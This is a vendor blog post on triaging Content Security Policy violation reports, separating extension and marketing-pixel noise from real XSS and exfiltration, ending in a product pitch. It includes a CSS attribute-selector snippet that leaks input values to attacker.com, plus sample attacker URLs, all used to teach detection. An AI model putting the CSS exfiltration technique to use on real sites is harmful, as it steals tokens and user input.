CSP violation reports: what they're trying to tell you

A field guide to the most common violated-directive values, which ones are real attacks, and which ones are just your marketing team adding a pixel.

GlitchReplay team · CSP · Security

You finally deploy a strict Content Security Policy to production. It's a big milestone for the security posture of your app. You've moved past the "Report-Only" phase and you're ready to actually block the bad stuff. Within ten minutes, your error tracker is flooded with 10,000 "violations." Your phone starts buzzing. Your first instinct is to panic—are you under a massive, coordinated XSS attack? Did a supply chain compromise just hit your frontend?

Then you take a breath and look at the blocked-uri. You see chrome-extension:// and google-analytics.com and safari-extension://. You haven't been hacked. You've just hit the "CSP Noise Wall."

Most developers treat CSP reports as "security spam" because they are incredibly noisy and often triggered by things the developer has zero control over. But buried inside that noise are the actual signals that tell you when a user is being phished or when a malicious script is trying to scrape your checkout page. This post is a decoder ring for those JSON payloads, designed to help you distinguish between a marketing team's new tracking pixel and a genuine security threat.

The Anatomy of a Violation: Reading the JSON

CSP reports aren't just generic error messages; they are structured telemetry. To triage them effectively, you need to understand the keys in the JSON object. The browser sends these reports as a POST request with an application/csp-report content type (or application/reports+json for the modern Reporting API), and the structure tells a very specific story.

violated-directive vs. effective-directive

The violated-directive is the literal string from your policy that was broken—for example, script-src 'self' https://trusted.com. However, the effective-directive is often more useful for debugging. If you have a broad default-src policy but haven't defined a font-src, a blocked font will show default-src as the violated directive, but font-src as the effective one. This tells you exactly which specific sub-policy you need to adjust.

blocked-uri vs. source-file

This is where most of the confusion happens. The blocked-uri is the resource that the browser refused to load. The document-uri is the page where the violation occurred, and source-file points at the specific script or stylesheet that tried to load the resource. If the blocked-uri is something like https://malicious-attacker.net/logger.php, you have a problem. If the blocked-uri is about:blank or inline, it means someone tried to inject a script directly into the HTML, which is a classic XSS pattern, but also a classic browser extension pattern.

The legacy report-uri vs. the modern report-to

We are currently in a transition period for CSP reporting. The legacy report-uri directive sends a single JSON object wrapped in a csp-report key. The modern report-to (part of the Reporting API) sends an array of report objects that can include CSP violations, crash reports, and deprecation warnings, with the violation details nested under a body key. Here is what a legacy report-uri payload looks like:

{
  "csp-report": {
    "document-uri": "https://glitchreplay.com/checkout",
    "referrer": "https://google.com/",
    "violated-directive": "script-src-elem",
    "effective-directive": "script-src-elem",
    "original-policy": "default-src 'self'; script-src 'self'; report-uri /api/csp-report",
    "disposition": "enforce",
    "blocked-uri": "https://evil.com/malware.js",
    "line-number": 42,
    "column-number": 12,
    "source-file": "https://glitchreplay.com/static/js/main.js",
    "status-code": 200,
    "script-sample": ""
  }
}

Notice the disposition field. In "Report-Only" mode, this will be report. In "Enforce" mode, it will be enforce. If you see enforce and the site is still working, it means your policy is successfully blocking something that shouldn't be there anyway.
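Because both formats are in the wild, your reporting endpoint has to normalize them. Here is a minimal sketch of that normalization in Python; the "csp-violation" type and the body key come from the Reporting API, while the exact keys inside each report vary by browser, so treat the field names as illustrative:

```python
import json

def parse_csp_reports(content_type: str, body: str) -> list[dict]:
    """Normalize legacy (report-uri) and modern (report-to) payloads
    into a flat list of violation dicts."""
    data = json.loads(body)
    if content_type.startswith("application/csp-report"):
        # Legacy: a single object wrapped in a "csp-report" key.
        return [data["csp-report"]]
    if content_type.startswith("application/reports+json"):
        # Modern: an array of reports of mixed types; keep only CSP
        # violations and unwrap their "body" payload.
        return [r["body"] for r in data if r.get("type") == "csp-violation"]
    return []
```

Doing this at the edge means the rest of your triage pipeline only ever sees one shape, regardless of which browser or directive produced the report.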

Tier 1 Noise: The "Ghost" Violations (Extensions & Plugins)

The single largest source of CSP noise comes from the user's own browser. Tools like Grammarly, LastPass, Honey, and various ad-blockers work by injecting scripts and styles into every page the user visits. Since your CSP doesn't (and shouldn't) whitelist grammarly.com or chrome-extension://..., the browser dutifully reports these as violations.

Why extensions trigger violations

When an extension wants to check your spelling or auto-fill a password, it often injects a <script> tag or an <iframe> into the DOM. Even if the extension is "trusted" by the user, the browser sees an external resource trying to execute in the context of your origin. Since your policy says "only load scripts from my own domain," the browser blocks it and sends you a report.

Identifying extension patterns

You can identify these "Ghost" violations by looking at the URI schemes in the blocked-uri field:

  • chrome-extension:// (Chrome)
  • moz-extension:// (Firefox)
  • safari-extension:// (Safari)
  • resource:// (Firefox internal)

If you see these, you can safely ignore them. You cannot fix them by changing your policy, and attempting to whitelist every possible extension ID is a fool's errand. A good error tracker should allow you to filter these out before they even hit your alert threshold.
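If your tracker doesn't filter these for you, the check is cheap to write yourself. A minimal sketch, assuming reports are already parsed into dicts with a blocked-uri key, using the scheme list above:

```python
# URI schemes that indicate a browser extension, not your code.
EXTENSION_SCHEMES = (
    "chrome-extension://",  # Chrome
    "moz-extension://",     # Firefox
    "safari-extension://",  # Safari
    "resource://",          # Firefox internal
)

def is_extension_noise(report: dict) -> bool:
    """True when the blocked resource came from a browser extension."""
    return report.get("blocked-uri", "").startswith(EXTENSION_SCHEMES)
```

Run this before alerting, not instead of logging: keep a counter of filtered reports so a sudden change in the noise floor is still visible.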

The "Injected Script" problem

Often, you'll see script-src violations where the blocked-uri is about:blank or just inline. This is the hardest noise to triage because it's exactly what a real XSS attack looks like. However, if the source-file is also about:blank, or if the report occurs across thousands of users with no common pattern, it's almost certainly a browser plugin "cleaning up" the DOM or injecting a helper script. We recommend ignoring script-src violations where the blocked-uri is about:blank unless you are seeing a massive spike on a specific sensitive page.

Tier 2 Noise: The "Marketing Pixel" Surprise

Shadow IT is the second biggest contributor to CSP noise. Marketing teams love Tag Managers (GTM, Adobe Launch, etc.). They can add a new Facebook, TikTok, or LinkedIn tracking pixel with two clicks in a web UI, completely bypassing the engineering team's pull request process.

Suddenly, your connect-src or img-src policy is being violated because a new pixel is trying to send data to a domain you've never heard of. This isn't a "security" threat in the traditional sense, but it is a policy violation that can break marketing attribution.

The img-src data-URI explosion

Many tracking pixels use 1x1 transparent GIFs to exfiltrate data. They encode event data into the query string of the image URL. If your img-src policy is strict, these will be blocked. You might also see data: URIs being blocked. While data: URIs are often used for small icons, they can also be used to execute scripts or exfiltrate data, which is why many security-conscious teams block them by default.

Distinguishing legit marketing from exfiltration

How do you know if https://analytics-gateway.xyz/v1/event is your marketing team or an attacker?

  • Check the document-uri: is this happening on the blog or the credit card entry page?
  • Search your codebase: is there a GTM container ID that might be loading this?
  • Look at the volume: malicious exfiltration is usually targeted or happens in a sudden burst, while marketing noise is constant and correlates with your traffic volume.
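Those checks can be sketched as a first-pass classifier. The sensitive paths and marketing hosts below are hypothetical placeholders; swap in your own routes and the domains your tag manager is actually known to load:

```python
from urllib.parse import urlparse

# Hypothetical lists: replace with your own sensitive routes and the
# hosts your tag manager legitimately loads.
SENSITIVE_PATHS = ("/checkout", "/login", "/account")
KNOWN_MARKETING_HOSTS = {"www.google-analytics.com", "connect.facebook.net"}

def classify(report: dict) -> str:
    blocked_host = urlparse(report.get("blocked-uri", "")).netloc
    page_path = urlparse(report.get("document-uri", "")).path
    if blocked_host in KNOWN_MARKETING_HOSTS:
        return "marketing"        # constant, traffic-correlated noise
    if any(page_path.startswith(p) for p in SENSITIVE_PATHS):
        return "investigate-now"  # unknown domain on a sensitive page
    return "review"               # unknown domain, low-value page
```

This won't replace the codebase search or the volume check, but it routes the obvious cases so a human only looks at the ambiguous ones.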

The "Real" Threats: Spotting XSS and Data Exfiltration

Once you've filtered out Grammarly and the Facebook pixel, what's left? This is the "Signal" you've been looking for. Real threats usually manifest in a few specific ways.

Unknown third-party domains in script-src

If you see a violation for a script from a domain like https://cdn-static-js.com/jquery.min.js (and you don't use that CDN), that is a high-priority event. Attackers often use domains that look "boring" or "technical" to hide in the noise. This could indicate a stored XSS where an attacker has successfully injected a script tag into a database field that is being rendered on your page.

form-action violations: The hallmark of phishing

This is one of the most underrated CSP directives. form-action limits where <form> data can be submitted. An attacker who has gained partial control of your DOM might not be able to execute JS (thanks to your script-src), but they might be able to change the action attribute of your login form to https://attacker-phish.com/collect. If you see a form-action violation, investigate it immediately. It is almost never caused by a browser extension.
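One cheap way to encode that advice in a triage pipeline is to fast-track certain directives past the noise filters entirely. This sketch keys off effective-directive; form-action comes from the section above, and base-uri is our own suggested addition since it enables similar redirection tricks:

```python
# Directives that are almost never triggered by extensions or marketing
# pixels. form-action per the discussion above; base-uri is an assumption.
HIGH_PRIORITY_DIRECTIVES = {"form-action", "base-uri"}

def alert_priority(report: dict) -> str:
    directive = report.get("effective-directive", "")
    return "page-immediately" if directive in HIGH_PRIORITY_DIRECTIVES else "standard"
```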

style-src and CSS Injection

Many people think style-src 'unsafe-inline' is harmless. It's just CSS, right? Wrong. Modern CSS is powerful enough to exfiltrate data. By using attribute selectors and background images, an attacker can steal CSRF tokens or sensitive input values. For example:

input[value^="a"] { background-image: url("https://attacker.com/log?char=a"); }
input[value^="b"] { background-image: url("https://attacker.com/log?char=b"); }

As the user types, the browser requests different background images, effectively logging every keystroke to the attacker's server. A CSP report for an unauthorized stylesheet or a style-src violation with an external blocked-uri should be treated with the same severity as a script violation.

Deciphering the "Eval" and "Inline" Headache

The most common directives you'll see in violations are 'unsafe-inline' and 'unsafe-eval'. These are the two biggest holes in any CSP, and closing them is difficult because modern web development relies on them heavily.

Hydration and Next.js/Vue

Modern frameworks like Next.js often trigger script-src violations during the "hydration" process, because the server-rendered HTML contains inline scripts for state management (like __NEXT_DATA__). If you haven't configured nonces or hashes correctly, the browser will block these scripts, and your app will lose its interactivity (the "uncanny valley" of web apps where it looks loaded but nothing clicks).

The "Refactored to Death" scenario

Sometimes a library update will suddenly start using WebAssembly.instantiate() or new Function(), which requires 'wasm-eval' or 'unsafe-eval'. If you see a sudden spike in violations after a deployment, check your package-lock.json. You might have accidentally pulled in a dependency that requires more permissions than your policy allows.

Using nonces and hashes: A better alternative

Instead of using 'unsafe-inline', you should use nonces ("numbers used once") or cryptographic hashes. A nonce is a random string generated fresh for every response and added to both the CSP header and each legitimate script tag. This allows those specific inline scripts to run while blocking any injected ones. If you see a violation for an inline script that *should* be running, check that your nonce is being correctly passed through your middleware to the template. You can read more about this in the Google Security Blog's guide to CSP nonces.
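The mechanics are small enough to show in a few lines. A hedged sketch: the directive list here is illustrative, and wiring the nonce from your middleware into the template engine (so it lands on each script tag) is framework-specific:

```python
import secrets

def csp_with_nonce() -> tuple[str, str]:
    """Generate a per-request nonce and the matching CSP header value.
    The caller must put the same nonce on every legitimate script tag."""
    nonce = secrets.token_urlsafe(16)  # fresh, unguessable, per response
    header = f"script-src 'self' 'nonce-{nonce}'; object-src 'none'"
    return nonce, header
```

The same nonce value must reach the markup as <script nonce="...">; a mismatch between header and template is exactly the "violation for a script that should be running" described above.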

Triage Workflow: From Alert to Resolution

When you're an SRE on call and you get a CSP alert, don't just ignore it. Follow this 4-step workflow to triage the noise effectively.

Step 1: Is the blocked-uri a known-good domain? Check it against a list of common extension schemes and your own marketing stack. If it's chrome-extension://, log it as noise and move on.

Step 2: Check the document-uri. Does this happen on /blog or /api/v1/checkout/confirm? A violation on a sensitive page is 10x more important than one on a public landing page. Use the importance of the page to weight the priority of the alert.

Step 3: Correlation. This is the most critical step. Use a tool like GlitchReplay to look at the session replay associated with the violation. When the CSP report was fired, what was the user doing? If they were just sitting there and a dozen about:blank scripts tried to fire, it's an extension. If the violation fired exactly when they clicked "Submit Order," you might have a real problem with a malicious script intercepting that action.

Step 4: Update vs. Ignore. If the violation is legitimate (e.g., the marketing team added a new tool), update your CSP header. If it's noise, add it to your error tracker's ignore list so it doesn't wake you up at 2 AM again.

How GlitchReplay Handles the Noise

At GlitchReplay, we built our CSP reporting endpoint specifically to solve the "Noise Wall" problem. Most error trackers (including Sentry) treat every CSP report as an individual "event" that counts against your monthly quota. If you get hit with a wave of extension noise, you could find yourself with a $500 bill just for "learning" that your users like Grammarly.

Grouping identical violations

We use sophisticated fingerprinting to group CSP violations. Instead of 10,000 individual errors, we show you one issue: "Grammarly Extension Violation" with a counter. We look at the violated-directive, the blocked-uri, and the source-file to ensure that noise is consolidated, while actual security signals remain distinct. You can read more about our approach in our post on error fingerprinting and deduplication.

Flat-rate pricing: No "Noise Tax"

Because we built GlitchReplay on a modern Cloudflare stack, our costs are significantly lower than legacy trackers. We offer flat-rate pricing, which means you can ingest 100k noise-heavy CSP reports without worrying about your bill. We believe you shouldn't be "fined" by your tooling just because your security policy is doing its job. Compare this to other providers in our pricing breakdown.

Integrating CSP with Replay

The biggest advantage of using GlitchReplay is the context. When a CSP violation occurs, we link it directly to the session replay. You can see the exact UI state, the console logs, and the network requests at the moment of the violation. This makes triaging "is it an XSS attack or just an extension?" a 10-second task instead of a 2-hour investigation. By seeing the actual DOM when the violation occurred, you can rule out false positives with 100% confidence.

Stop paying per-event "penalties" for CSP noise. Switch to GlitchReplay's Sentry-compatible endpoint and get the full session context for every security violation. Your SRE team (and your CFO) will thank you.

Stop watching your error bill spike.

GlitchReplay is Sentry-SDK compatible, includes session replay and security signals, and never charges per event. Free to start, five minutes to first event.